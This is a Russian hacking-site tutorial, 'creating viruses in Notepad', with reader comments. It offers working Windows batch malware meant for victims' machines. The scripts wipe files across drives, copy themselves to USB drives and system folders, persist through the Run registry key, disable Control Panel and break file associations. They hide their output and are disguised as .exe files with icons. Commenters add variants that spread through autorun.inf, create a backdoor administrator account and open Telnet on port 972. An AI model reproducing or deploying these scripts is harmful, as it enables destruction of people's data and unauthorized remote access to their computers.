Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Самоучитель по созданию вирусов в блокноте Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Самоучитель по созданию вирусов в блокноте

19.11.2009

Самоучитель по созданию вирусов в блокноте

Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:
1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;
4) Откроем файлик и увидим, что открылся Paint))
Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:
Пишем в блокноте:

time 00:00
copy %0 F:\Work.bat

Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.
СПИСОК:

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок)  (пример del F:\Data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.
1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

del F:\ *.* /q
label F:HACK

2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat

 
Вы уже умеете создавать простенькие вирусы.
Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. Теперь я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico. Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем www.Google.ru, пишем bat вирусы и жмем «Искать». 
 
Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q

Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться,  пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.
Итак, дальше поехали дальше:

:x ;
Start mspaint
goto x ;

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать  по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт:

copy ""%0"" "%SystemRoot%\system32\File.bat" 
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше))

assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и  .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от SMOKED'а, вирусо-писательства. Если же нет. Читаем все заново))
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul 
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ; 
Start mspaint 
goto x ; 
:x ; 
Start Calc 
goto x ; 
copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

На этом мои уроки закончены. Надеюсь, вам понравилось! С уважением SMOKED!
P.S. Когда я первый раз выложил эту статью в интернет. На мой ICQ прийшло около 70 сообщений с просьбой ломануть мыло)) Писал все сам, статья моя! =)

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Программирование
Опубликовал: SM0KED
Просмотров: 130472
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Спасибо огромное!Давно искал что нибудь такое,а находил сразу типа делфи или с++
19.11.2009 / sniffer11
Понятно! Я на это и делал давление! =)
20.11.2009 / SM0KED
вот только этот батник до конца никогда не доработает, а зависнет в этом цикле:
Text
:x ;
Start mspaint
goto x ;
20.11.2009 / burguy
Так это специально так)) Тоесть, что бы циклично открывал программу очень много раз! И камп зависал! Вот так.
20.11.2009 / SM0KED
Оличная статья плучилась! У меня получилось сделать чтоб вирус без конца комп перезагружал)))
 
@echo off
title windows update
reg add «hkcu\software\microsoft\windows\CurrentVersion\run» /v Virus /t reg_sz /d %windir%\*.bat
copy %0 %windir%<b
19.12.2009 / Svetlana4
Прыкольно)) Прыкольно. +1
06.01.2010 / KSIRUS
Как раз то, что я искал!
08.02.2010 / DeSTR
Отличная тема я только начинаю.+10
11.02.2010 / Nikopo_56
Спасибо всем. По моему счетчику приблизительно 2300 человек, написали мне на асю про статью))
13.02.2010 / SM0KED
все хотели антивирус новый антивирус нотблокнот!
22.02.2010 / NJIbN4
Автор рулит))  спасибо огромное долго искал что то на подобие этого))
19.03.2010 / ZOMBIE
дайте команду на сворачевание всех окон
21.03.2010 / alias
Круто! Не, я конечно знал что есть вирусы, но не знал что это так весело!!!  :)
02.04.2010 / porshegt3
Интересно то как!
13.04.2010 / azamprod
Где можно посмотреть все команды?
13.04.2010 / azamprod
Вот маё детище: Bayan я его из bat в exe конвертировал
@Echo off
copy ""%0"" "%SystemRoot%\system32\ControlF.exe"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ControlF" /t REG_SZ /d "%SystemRoot%\system32\ControlF.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
attrib +r +s "%SystemRoot%\system32\ControlF.exe"
cls
attrib -r -a -s -h B:\autorun.inf
echo [autorun] > B:\autorun.inf
echo open=B:\ControlF.exe >> B:\autorun.inf
copy %0 B:\ControlF.exe
cls
copy %0 C:\ControlF.exe
copy %0 D:\ControlF.exe
cls
attrib -r -a -s -h E:\autorun.inf
echo [autorun] > E:\autorun.inf
echo open=E:\ControlF.exe >> E:\autorun.inf
copy %0 E:\ControlF.exe
cls
attrib -r -a -s -h F:\autorun.inf
echo [autorun] > F:\autorun.inf
echo open=F:\ControlF.exe >> F:\autorun.inf
copy %0 F:\ControlF.exe
cls
attrib -r -a -s -h G:\autorun.inf
echo [autorun] > G:\autorun.inf
echo open=G:\ControlF.exe >> G:\autorun.inf
copy %0 G:\ControlF.exe
cls
attrib -r -a -s -h H:\autorun.inf
echo [autorun] > H:\autorun.inf  
echo open=H:\ControlF.exe >> H:\autorun.inf
copy %0 H:\ControlF.exe
cls
attrib -r -a -s -h I:\autorun.inf
echo [autorun] > I:\autorun.inf
echo open=I:\ControlF.exe >> I:\autorun.inf
copy %0 I:\ControlF.exe
cls
attrib -r -a -s -h K:\autorun.inf
echo [autorun] > K:\autorun.inf
echo open=K:\ControlF.exe >> K:\autorun.inf  
copy %0 K:\ControlF.exe
cls
if exist C:\WINDOWS\Откат.txt goto end2
if exist c:\1.reg goto 1
echo Windows Registry Editor Version 5.00 > c:\1.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\1.reg
echo "NoThemesTab"=dword:00000001 >> c:\1.reg
:1
REGEDIT /S C:\1.reg
cls
if exist c:\2.reg goto 2
echo Windows Registry Editor Version 5.00 > c:\2.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\2.reg
echo "NoDispSettingsPage"=dword:00000001 >> c:\2.reg
:2
REGEDIT /S C:\2.reg
cls
if exist c:\3.reg goto 3
echo Windows Registry Editor Version 5.00 > c:\3.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\3.reg
echo "NoDispBackgroundPage"=dword:00000001 >> c:\3.reg
:3
REGEDIT /S C:\3.reg
cls
if exist c:\4.reg goto 4
echo Windows Registry Editor Version 5.00 > c:\4.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall] >> c:\4.reg
echo "NoAddRemovePrograms"=dword:00000001 >> c:\4.reg
:4
REGEDIT /S C:\4.reg
copy %0 C:\Восстановление системы.exe
if exist C:\WINDOWS\Откат.txt goto end
 
chcp 1251
net user SUPPORT_388945a0 /delete
net user Mister Hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
:end
@Echo on
exit
19.06.2010 / misterhacker
классBeerchug
29.09.2010 / Max123
СПС огромное очень даже улыбнуло
13.10.2010 / Shkap
А как сделать чтобы bat вошел в папку с русским названием, в командной строке нашел как, а вот через bat не заходит. Пишет не удалось найти указанный путь(( Помогите плиз
14.10.2010 / Shkap
пишешь в bat'e
chcp 1251
и моешь использовать руские символы и названия. если путь к папке содерит пробелы закючи его в кавычки, например
cd "C:\Program Files"
17.12.2010 / AbWriter
Классно и интересно)))
08.02.2011 / ___BBC___
Классная статья
05.03.2011 / akubinec
нашол команду choise /N/T:y, сек > nul пишут что она работает как таймер, о у меня неработает Tick как её юзать или какие похожие команды есть?
27.04.2011 / MOK159
Отличная статья. Все понятно, и просто. При этом под рукой нужно минимум инструментов. Только блокнот, хе-хе.Beerchug
07.05.2011 / Altay
1- @echo off
2- %SystemRoot%/system32/rundll32 user32, SwapMouseButton
3- copy %0 c:\Work.bat
4- start c:\Work.bat
5- copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
6- chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
7- sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
8- echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
9- copy %0 "c:\windows\program files\Work.bat"
start "c:\windows\program files\Work.bat"
copy %0 c:\windows\system32\Work.bat
start c:\windows\system32\Work.bat
copy %0 c:\windows\Work.bat
start c:\windows\Work.bat
copy %0 f:\Work.bat
start f:\Work.bat
copy %0 e:\Work.bat
start e:\Work.bat
copy %0 d:\Work.bat
start d:\Work.bat
10- start http://www.youtube.com/watch?v=5rDflw0OiEc&feature=related
start http://4stor.ru/strashilki/page,1,1,1762-mereana-mordegard-glesgorv-i-drugie-anomalnye-roliki.html
start http://www.youtube.com/watch?v=ZgWPbnwsIeE&feature=player_embedded
start http://www.youtube.com/watch?v=r8zSPJyA8zw
start http://www.youtube.com/watch?v=k2gum0WWLiI
start http://www.youtube.com/watch?v=yr2bHdqGacA
11- label c:error
label F:HACK
label D:HACK
time 00:00
date 21.12.12
12- FOR /L %%i IN (1,1,1000000) DO md %%i
13- :x ;
msg * Virus Loading
goto x;
:x ;
msg * Restart your computer
goto x;
:x ;
msg * "Russian hacker pro"
goto x;
:x ;
msg * "Windows error"
goto x;
:x ;
msg * "resistance is futile"
goto x;
14- :x ;
start mspaint
goto x;
.
.
1)скрываем что происходит в вирусе
2)что бы юзер его быстро не выключил меняем клавиши мыши местами
3)копируем наш вирус
4)и запускаем копию
5)ставим в автозапуск винды
6)ставим нового пользователя админа со своим паролем и логином
7)запускаем telnet через 972 порт
8)включаем светомузыку (лампочки на нумлоком будут мигать)
9)делаем кучу копий и запускаем их
10)ну я сделал чтобы открывал психоделические видео на youtube.ru
11)меняем: имя дисков, время, и дату на конец света
12)создаём миллион папок там где находится вирус
13)(число дьявола)      выводим бесконечные сообщения 1- Virus Loading 2- Restart your computer 3- Russian hacker pro 4- Windows error
14)бесконечный запуск пайнт
.
.
Супер статья начинал с неё!!
07.05.2011 / nohack
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
 
как эту хрень исправить??Evil
 
а то мой прелюбимый друг - дебил
запустиль все это дело на моем компе!!!!Mad
(сначала ткнул... а потом спросил что это такое??)
 
короче высааад((( помогите люди!!! прашууу!!!!
15.06.2011 / cTaJIuH
Throwup кто занимается всем этим бредом,ни один батник не пройдет проверку даже вшивого доктор веба
12.11.2011 / YarikPROVOD
Объясните нубу где можно просмотреть полный список команд?? Или на каком языке это написанно??))Idea
21.12.2011 / Guf_RiP
cTaJIuH пишешь assoc.exe=exefile. на 7 и XP работает.
11.04.2012 / dacdil
подскажите как можнго обойти анти вирус? возможно ли это,у меня просто анти блочит подобного рода Батники ((
08.09.2012 / HackKing
Я нуб просто хочу узнать на каком языке написаны все эти вирусы?
01.11.2012 / shed777
это команди командной сроки виндовс
20.02.2013 / sansan14
это команды командной строки виндовс
20.02.2013 / sansan14
Ребят, я нуб. На 7 начальной не меняется txt. Что-то можно сделать?
25.07.2013 / OnlyTwist
Почему то вирусы блокнотные не активирует мой Виндовс 7.
Пример:
@echo off
title . >nul
assoc .exe=dllfile
exit >nul
21.01.2016 / el Zi.exe
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Взлом и безопасность / Новичкам » Взламать фейсбук
  • Разное / Предложения работы » Re: Нужен взлом Вайбер
  • Разное / Предложения работы » Есть ли настоящая возможность украсть переписку Viber?
  • Разное / Предложения работы » скачать дистрибутив с фтп
  • Взлом и безопасность / Программы » Re: Взлом программы
  • Разное / Предложения работы » Re: Нужен взлом вконтакте
  • Разное / Продам, отдам » Абузоустойчивый сервис по очень низким ценам
  • Разное / Предложения работы » Нужен взлом вконтакте
  • Взлом и безопасность / Программы » Взлом программы

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}